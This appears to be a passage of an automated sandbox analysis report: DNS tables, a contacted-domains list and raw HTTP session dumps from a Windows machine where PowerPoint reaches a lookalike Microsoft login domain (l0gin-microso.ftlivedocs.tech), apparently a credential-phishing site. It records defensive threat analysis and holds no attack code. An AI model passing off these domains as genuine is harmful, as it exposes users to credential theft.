                                                                                                                              Oct 4, 2024 15:11:45.386974096 CEST53587801.1.1.1192.168.2.17
                                                                                                                              Oct 4, 2024 15:11:45.602827072 CEST53652471.1.1.1192.168.2.17
                                                                                                                              Oct 4, 2024 15:12:03.597132921 CEST5513853192.168.2.171.1.1.1
                                                                                                                              Oct 4, 2024 15:12:03.597265005 CEST5587253192.168.2.171.1.1.1
                                                                                                                              Oct 4, 2024 15:12:13.718616962 CEST53549781.1.1.1192.168.2.17
                                                                                                                              TimestampSource IPDest IPChecksumCodeType
                                                                                                                              Oct 4, 2024 15:11:09.123887062 CEST192.168.2.171.1.1.1c250(Port unreachable)Destination Unreachable
                                                                                                                              Oct 4, 2024 15:11:12.526268959 CEST192.168.2.171.1.1.1c252(Port unreachable)Destination Unreachable
                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                              Oct 4, 2024 15:10:45.645649910 CEST192.168.2.171.1.1.10x330aStandard query (0)nomicscare.comA (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:10:45.645823002 CEST192.168.2.171.1.1.10xdcb4Standard query (0)nomicscare.com65IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:10:47.216768980 CEST192.168.2.171.1.1.10xfd12Standard query (0)crewbloom.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:10:47.216929913 CEST192.168.2.171.1.1.10x1208Standard query (0)crewbloom.s3.amazonaws.com65IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:10:48.219113111 CEST192.168.2.171.1.1.10x9bf5Standard query (0)pbs.twimg.comA (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:10:48.219264984 CEST192.168.2.171.1.1.10x9699Standard query (0)pbs.twimg.com65IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:10:50.149939060 CEST192.168.2.171.1.1.10xfe8fStandard query (0)pbs.twimg.comA (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:10:50.150091887 CEST192.168.2.171.1.1.10xc522Standard query (0)pbs.twimg.com65IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:10:50.251413107 CEST192.168.2.171.1.1.10x18e1Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:10:50.251609087 CEST192.168.2.171.1.1.10xa707Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:10:58.141937971 CEST192.168.2.171.1.1.10xa806Standard query (0)l0gin-microso.ftlivedocs.techA (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:10:58.142151117 CEST192.168.2.171.1.1.10xd383Standard query (0)l0gin-microso.ftlivedocs.tech65IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:10:59.134464025 CEST192.168.2.171.1.1.10x88d6Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:10:59.134639978 CEST192.168.2.171.1.1.10xe4Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:11:02.127319098 CEST192.168.2.171.1.1.10x6b88Standard query (0)l0gin-microso.ftlivedocs.tech65IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:11:02.127319098 CEST192.168.2.171.1.1.10x347Standard query (0)l0gin-microso.ftlivedocs.techA (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:11:02.244987011 CEST192.168.2.171.1.1.10xc617Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:11:02.245239019 CEST192.168.2.171.1.1.10x2337Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:11:02.248673916 CEST192.168.2.171.1.1.10x435cStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:11:02.248919964 CEST192.168.2.171.1.1.10x8c0Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:11:03.583522081 CEST192.168.2.171.1.1.10x9ebdStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:11:03.583669901 CEST192.168.2.171.1.1.10xdaf2Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:11:09.090667963 CEST192.168.2.171.1.1.10x619fStandard query (0)www.ftlivedocs.techA (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:11:09.090892076 CEST192.168.2.171.1.1.10xdb1eStandard query (0)www.ftlivedocs.tech65IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:11:12.435842991 CEST192.168.2.171.1.1.10xbe0Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:11:12.439958096 CEST192.168.2.171.1.1.10x2f20Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:11:12.500124931 CEST192.168.2.171.1.1.10x9c8cStandard query (0)ywnjb.ftlivedocs.techA (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:11:12.500252962 CEST192.168.2.171.1.1.10xc289Standard query (0)ywnjb.ftlivedocs.tech65IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:12:03.597132921 CEST192.168.2.171.1.1.10x92e9Standard query (0)identity.nel.measure.office.netA (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:12:03.597265005 CEST192.168.2.171.1.1.10xcb67Standard query (0)identity.nel.measure.office.net65IN (0x0001)false
                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                              Oct 4, 2024 15:10:41.966276884 CEST1.1.1.1192.168.2.170x7c4aNo error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.nets-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:10:41.966276884 CEST1.1.1.1192.168.2.170x7c4aNo error (0)s-part-0032.t-0009.t-msedge.net13.107.246.60A (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:10:45.835630894 CEST1.1.1.1192.168.2.170x330aNo error (0)nomicscare.com51.255.64.170A (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:10:47.251015902 CEST1.1.1.1192.168.2.170x1208No error (0)crewbloom.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:10:47.251015902 CEST1.1.1.1192.168.2.170x1208No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:10:47.251332045 CEST1.1.1.1192.168.2.170xfd12No error (0)crewbloom.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:10:47.251332045 CEST1.1.1.1192.168.2.170xfd12No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:10:47.251332045 CEST1.1.1.1192.168.2.170xfd12No error (0)s3-w.us-east-1.amazonaws.com3.5.1.122A (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:10:47.251332045 CEST1.1.1.1192.168.2.170xfd12No error (0)s3-w.us-east-1.amazonaws.com52.216.205.43A (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:10:47.251332045 CEST1.1.1.1192.168.2.170xfd12No error (0)s3-w.us-east-1.amazonaws.com52.216.144.107A (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:10:47.251332045 CEST1.1.1.1192.168.2.170xfd12No error (0)s3-w.us-east-1.amazonaws.com3.5.28.106A (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:10:47.251332045 CEST1.1.1.1192.168.2.170xfd12No error (0)s3-w.us-east-1.amazonaws.com3.5.16.62A (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:10:47.251332045 CEST1.1.1.1192.168.2.170xfd12No error (0)s3-w.us-east-1.amazonaws.com52.217.117.97A (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:10:47.251332045 CEST1.1.1.1192.168.2.170xfd12No error (0)s3-w.us-east-1.amazonaws.com54.231.135.25A (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:10:47.251332045 CEST1.1.1.1192.168.2.170xfd12No error (0)s3-w.us-east-1.amazonaws.com52.217.196.145A (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:10:48.231281996 CEST1.1.1.1192.168.2.170x9bf5No error (0)pbs.twimg.comdualstack.twimg.twitter.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:10:48.231281996 CEST1.1.1.1192.168.2.170x9bf5No error (0)dualstack.twimg.twitter.map.fastly.net146.75.52.159A (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:10:48.231997967 CEST1.1.1.1192.168.2.170x9699No error (0)pbs.twimg.comdualstack.twimg.twitter.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:10:50.156817913 CEST1.1.1.1192.168.2.170xfe8fNo error (0)pbs.twimg.comdualstack.twimg.twitter.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:10:50.156817913 CEST1.1.1.1192.168.2.170xfe8fNo error (0)dualstack.twimg.twitter.map.fastly.net146.75.52.159A (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:10:50.157031059 CEST1.1.1.1192.168.2.170xc522No error (0)pbs.twimg.comdualstack.twimg.twitter.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:10:50.259618998 CEST1.1.1.1192.168.2.170xa707No error (0)www.google.com65IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:10:50.259639025 CEST1.1.1.1192.168.2.170x18e1No error (0)www.google.com142.250.185.68A (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:10:58.156833887 CEST1.1.1.1192.168.2.170xa806No error (0)l0gin-microso.ftlivedocs.tech104.26.12.69A (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:10:58.156833887 CEST1.1.1.1192.168.2.170xa806No error (0)l0gin-microso.ftlivedocs.tech104.26.13.69A (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:10:58.156833887 CEST1.1.1.1192.168.2.170xa806No error (0)l0gin-microso.ftlivedocs.tech172.67.71.124A (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:10:58.159579039 CEST1.1.1.1192.168.2.170xd383No error (0)l0gin-microso.ftlivedocs.tech65IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:10:58.555326939 CEST1.1.1.1192.168.2.170x6cc6No error (0)templatesmetadata.office.nettemplatesmetadata.office.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:10:59.146250963 CEST1.1.1.1192.168.2.170x88d6No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:10:59.146250963 CEST1.1.1.1192.168.2.170x88d6No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:10:59.147727966 CEST1.1.1.1192.168.2.170xe4No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:11:02.150150061 CEST1.1.1.1192.168.2.170x6b88No error (0)l0gin-microso.ftlivedocs.tech65IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:11:02.150163889 CEST1.1.1.1192.168.2.170x347No error (0)l0gin-microso.ftlivedocs.tech104.26.13.69A (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:11:02.150163889 CEST1.1.1.1192.168.2.170x347No error (0)l0gin-microso.ftlivedocs.tech104.26.12.69A (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:11:02.150163889 CEST1.1.1.1192.168.2.170x347No error (0)l0gin-microso.ftlivedocs.tech172.67.71.124A (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:11:02.252788067 CEST1.1.1.1192.168.2.170xc617No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:11:02.252788067 CEST1.1.1.1192.168.2.170xc617No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:11:02.253099918 CEST1.1.1.1192.168.2.170x2337No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:11:02.256145000 CEST1.1.1.1192.168.2.170x8c0No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:11:02.256215096 CEST1.1.1.1192.168.2.170x435cNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:11:02.256215096 CEST1.1.1.1192.168.2.170x435cNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:11:03.590678930 CEST1.1.1.1192.168.2.170x9ebdNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:11:09.107079029 CEST1.1.1.1192.168.2.170x619fNo error (0)www.ftlivedocs.tech172.67.71.124A (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:11:09.107079029 CEST1.1.1.1192.168.2.170x619fNo error (0)www.ftlivedocs.tech104.26.12.69A (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:11:09.107079029 CEST1.1.1.1192.168.2.170x619fNo error (0)www.ftlivedocs.tech104.26.13.69A (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:11:09.123783112 CEST1.1.1.1192.168.2.170xdb1eNo error (0)www.ftlivedocs.tech65IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:11:10.744714975 CEST1.1.1.1192.168.2.170x351dNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:11:10.744714975 CEST1.1.1.1192.168.2.170x351dNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:11:11.649435997 CEST1.1.1.1192.168.2.170xaca9No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:11:11.649435997 CEST1.1.1.1192.168.2.170xaca9No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:11:12.442467928 CEST1.1.1.1192.168.2.170xbe0No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:11:12.442467928 CEST1.1.1.1192.168.2.170xbe0No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:11:12.442467928 CEST1.1.1.1192.168.2.170xbe0No error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:11:12.447712898 CEST1.1.1.1192.168.2.170x2f20No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:11:12.447712898 CEST1.1.1.1192.168.2.170x2f20No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:11:12.510883093 CEST1.1.1.1192.168.2.170x9c8cNo error (0)ywnjb.ftlivedocs.tech172.67.71.124A (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:11:12.510883093 CEST1.1.1.1192.168.2.170x9c8cNo error (0)ywnjb.ftlivedocs.tech104.26.12.69A (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:11:12.510883093 CEST1.1.1.1192.168.2.170x9c8cNo error (0)ywnjb.ftlivedocs.tech104.26.13.69A (IP address)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:11:12.526141882 CEST1.1.1.1192.168.2.170xc289No error (0)ywnjb.ftlivedocs.tech65IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:12:03.607804060 CEST1.1.1.1192.168.2.170x92e9No error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              Oct 4, 2024 15:12:03.621838093 CEST1.1.1.1192.168.2.170xcb67No error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                              • slscr.update.microsoft.com
                                                                                                                              • otelrules.azureedge.net
                                                                                                                              • login.live.com
                                                                                                                              • nomicscare.com
                                                                                                                              • crewbloom.s3.amazonaws.com
                                                                                                                              • https:
                                                                                                                                • pbs.twimg.com
                                                                                                                                • l0gin-microso.ftlivedocs.tech
                                                                                                                                • challenges.cloudflare.com
                                                                                                                                • www.ftlivedocs.tech
                                                                                                                                • aadcdn.msauth.net
                                                                                                                                • ywnjb.ftlivedocs.tech
                                                                                                                              • a.nel.cloudflare.com
                                                                                                                              • evoke-windowsservices-tas.msedge.net
                                                                                                                              • www.bing.com
                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              0192.168.2.17497044.175.87.197443
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:10:37 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=6Xtt1sBzydtZp6M&MD=91XKTh55 HTTP/1.1
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Accept: */*
                                                                                                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                              Host: slscr.update.microsoft.com
                                                                                                                              2024-10-04 13:10:37 UTC560INHTTP/1.1 200 OK
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Pragma: no-cache
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              Expires: -1
                                                                                                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                              ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                              MS-CorrelationId: 6968e628-1d64-40e8-8da4-25890244780d
                                                                                                                              MS-RequestId: 854d2973-bdec-427b-9c16-79addaf893b3
                                                                                                                              MS-CV: z3IKoM23YU2sHg0u.0
                                                                                                                              X-Microsoft-SLSClientCache: 2880
                                                                                                                              Content-Disposition: attachment; filename=environment.cab
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Date: Fri, 04 Oct 2024 13:10:37 GMT
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 24490
                                                                                                                              2024-10-04 13:10:37 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                              Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                              2024-10-04 13:10:37 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                              Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              1192.168.2.174970913.107.246.604436380C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:10:42 UTC227OUTGET /rules/powerpnt.exe-Production-v19.bundle HTTP/1.1
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Accept-Encoding: gzip
                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft PowerPoint 16.0.16827; Pro)
                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                              2024-10-04 13:10:42 UTC542INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:10:42 GMT
                                                                                                                              Content-Type: text/plain
                                                                                                                              Content-Length: 1183116
                                                                                                                              Connection: close
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Cache-Control: public
                                                                                                                              Last-Modified: Mon, 30 Sep 2024 13:16:38 GMT
                                                                                                                              ETag: "0x8DCE1521E2C3658"
                                                                                                                              x-ms-request-id: f0b719dc-501e-0016-7a5e-16181b000000
                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                              x-azure-ref: 20241004T131042Z-15767c5fc55852fxfeh7csa2dn0000000ck00000000036hm
                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                              X-Cache: TCP_MISS
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              2024-10-04 13:10:42 UTC15842INData Raw: 31 30 30 30 34 32 76 32 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 34 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 55 58 2e 44 65 73 6b 74 6f 70 2e 4f 66 66 69 63 65 54 68 65 6d 65 2e 41 70 70 2e 49 6e 69 74 22 20 41 54 54 3d 22 63 34 33 38 38 63 39 37 37 32 39 37 34 31 33 62 62 30 35 34 62 61 64 31 61 63 66 30 61 64 65 31 2d 63 63 35 38 65 35 33 65 2d 66 35 61 34 2d 34 66 33 37 2d 62 30 64 32 2d 39 61 38 30 37 39 65 33 34 34 32 30 2d 36 38 37 39 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 63 6d 39 79 35
                                                                                                                              Data Ascii: 100042v2+<?xml version="1.0" encoding="utf-8"?><R Id="100042" V="2" DC="SM" EN="Office.UX.Desktop.OfficeTheme.App.Init" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="cm9y5
                                                                                                                              2024-10-04 13:10:42 UTC16384INData Raw: 22 20 46 3d 22 41 75 74 68 6f 72 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 30 31 31 37 76 30 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 31 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 38 79 6c 6c 66 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22
                                                                                                                              Data Ascii: " F="AuthorCount" /> </C> <T> <S T="1" /> </T></R><$!#>100117v0+<?xml version="1.0" encoding="utf-8"?><R Id="100117" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="8yllf" /> </S> <C T="W" I="0" O="false"
                                                                                                                              2024-10-04 13:10:42 UTC16384INData Raw: 20 20 3c 41 20 54 3d 22 53 55 4d 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 41 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 33 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 37 38 31 76 31 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 37 38 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 62 67 6f 34 74 22 20 2f 3e 0d 0a
                                                                                                                              Data Ascii: <A T="SUM"> <S T="1" F="11" /> </A> </C> <T> <S T="2" /> <S T="3" /> </T></R><$!#>10781v1+<?xml version="1.0" encoding="utf-8"?><R Id="10781" V="1" DC="SM" T="Subrule" xmlns=""> <S> <UTS T="1" Id="bgo4t" />
